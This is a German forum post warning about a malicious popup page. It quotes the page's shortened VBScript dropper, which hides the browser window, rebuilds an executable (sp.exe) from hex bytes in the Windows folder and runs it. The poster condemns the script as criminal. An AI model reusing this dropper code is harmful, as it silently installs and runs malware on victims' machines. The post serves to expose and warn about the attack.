Moin!

http://www.ntsearch.com/popengine/popup.php
Da ist der Schädling.
Ein VBS- Script, welches die so.exe schreibt.

Ich hab das Skript mal zusammengekürzt:

<HTML>
<SCRIPT language=vbs>
 self.MoveTo 1500, 1500
 prog = prog & "4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,"
...
 prog = prog & "00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
 tmp = Split(prog, ",")
 Set fso = CreateObject("Scripting.FileSystemObject")
 Set shell = CreateObject("WScript.Shell")
 folder = fso.GetSpecialFolder(0)
 path =  folder & "\sp.exe"
 Set f = fso.CreateTextFile(path, True)
 For i = 0 To UBound(tmp)
   l = Len(tmp(i))
   prog = Int("&H" & Left(tmp(i), 2))
   If l > 2 Then
     r = Int("&H" & Mid(tmp(i), 3, l))
     For j = 1 To r
       f.Write Chr(prog)
     Next
   Else
     f.Write Chr(prog)
   End If
 Next
 f.Close
 shell.Run(path)
 self.Close
</SCRIPT>
</HTML>

Dieses Skript ist schlicht als kriminell zu bewerten. Es schreibt eine executable (sp.exe) und startet diese. Das die "freundlichen" Verschleuederer des Virus sich Ihrer kriminellen Tätigkeit bwust sind bweist deren Versteckspiel:  self.MoveTo 1500, 1500 soll das Browserfenster verschieben und kann das wohl auch. - Arme IE- Benutzer!

MFFG (Mit freundlich- friedfertigem Grinsen)

fastix®